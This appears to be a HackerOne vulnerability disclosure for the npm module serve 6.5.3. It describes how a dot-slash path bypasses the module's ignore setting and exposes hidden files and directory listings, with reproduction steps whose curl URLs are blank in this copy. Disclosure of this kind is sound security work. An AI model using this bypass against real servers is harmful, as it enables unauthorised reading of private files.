Node.js third-party modules: [serve] Directory listing and File access even when they have been set to be ignored (using dot-slash)

ID H1:330724
Type hackerone
Reporter tungpun
Modified 2018-05-30T13:04:31


I would like to report a vulnerability in serve. It allows listing directory and reading local files on the target server.


module name: serve version: 6.5.3 npm page:

Module Description

Ever wanted to share a project on your network by running just a command? Then this module is exactly what you're looking for: It provides a neat interface for listing the directory's contents and switching into sub folders.

In addition, it's also awesome when it comes to serving static sites!


Steps To Reproduce:

  • Install serve:

$ npm i serve

  • Create some child directories, files for demonstration:

$ mkdir dir

$ echo "This is secret content!!" > dir/secret.txt

$ mkdir dir/dir2

$ touch dir/dir2/3.txt

  • Create an application that uses serve for file serving listing and set a few folders and files in the ignore config.

const serve = require('serve') const server = serve(__dirname, { port: 6060, ignore: ['dir/secret.txt', 'dir/dir2'] })

  • Run the app

$ node app.js

Now, the current directory will be served by this module on port 6060 with the exception of file dir/secret.txt and directory 'dir/dir2.

  • If we try to request these ignored files/directories, we get a Not Found error

$ curl --path-as-is '' Not Found

$ curl --path-as-is '' Not Found

or if we replace e character with URI encoded form %65, it still be ignored:

$ curl --path-as-is '' Not Found

  • However, I found a way to access that file by using dot-slash.

$ curl --path-as-is '' This is secret content!!

Or listing the directory:


Supporting Material/References:

  • macOS High Sierra 10.13.3
  • node v8.10.0
  • npm 5.8.0
  • Chrome Version 65.0.3325.162 (Official Build) (64-bit)

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N


It bypasses the ignore files/directories feature and allows an attacker to read a file or list the directory that the victim has not allowed access to.